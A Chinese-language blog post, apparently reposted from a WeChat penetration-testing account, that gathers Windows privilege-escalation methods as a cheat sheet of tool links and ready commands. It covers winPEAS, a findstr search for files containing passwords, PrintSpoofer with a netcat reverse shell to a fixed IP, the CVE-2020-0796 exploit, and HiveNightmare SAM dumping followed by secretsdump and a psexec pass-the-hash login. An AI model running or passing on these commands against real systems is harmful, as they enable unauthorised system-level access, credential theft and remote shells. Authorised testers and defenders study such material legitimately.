0x01 阅读须知
鸡哥安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞复现
1.提权辅助工具winpeas.exe,以下为使用方法
1.下载地址:
https://github.com/carlospolop/PEASS-ng
2.WinPEAS.exe 的目标是在 Windows 环境中搜索可能的权限提升路径,需要目标系统(.Net >= 4.5.2)环境,支持打印输出颜色。
3.使用方法:
①winPEASany.exe log=result.txt //检查所有并打印
②使用自带notepad打开result.txt并改为ANSI编码 //不然中文会显示乱码
③type result即可
2.windows查找文件内容有 password 的文件:
findstr /si password *.txt *.xml *.docx *.ini
3.PrintSpoofer提权
1.下载地址
https://github.com/itm4n/PrintSpoofer
2.影响版本
Windows 10和Windows Service 2016/2019
3.提权命令
PrintSpoofer64.exe -i -c cmd
或者通过nc进行反弹shell
PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd"
nc.exe -l -p 1337
4.CVE-2020-0796提权
1.下载地址
https://github.com/danigargu/CVE-2020-0796/releases/tag/v1.0
2.影响版本
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
3.提权命令,即可得到system权限
cve-2020-0796-local.exe
5.CVE-2021-36934提权
1.下载地址
https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe 作者:东塔网络安全 https://www.bilibili.com/read/cv12586737 出处:bilibili
2.影响版本
Windows 10和Windows Service 2016/2019
以及输入icacls c:windowssystem32configsam命令显示为BUILTINUsers:(I)(RX)的
3.提权命令
①.HiveNightmare.exe //导出SAM-haxx以及SYSTEM-haxx和SECURITY-haxx三个文件
②.python3 secretsdump.py -sam SAM-2022-09-15 -system SYSTEM-2022-09-15 -security SECURITY-2022-09-15 LOCAL //生成hash值
③.python3 psexec.py -hashes aad3b435b51404ee2ad3b435b51404ee:b4f38c38404c022912ffc78fa90bc681 xx@192.168.1.8 cmd.exe //连接即可
④.虚拟机则需要如下步骤才可导出SAM:右键点击此电脑-》属性-》系统保护-》配置-》启用系统保护-》创建”设置一个test还原点
1个1朵5毛钱
天天搬砖的小M
能不能吃顿好的
就看你们的啦
原文始发于微信公众号(鸡哥的内网渗透之路):内网渗透 常用windows提权方法1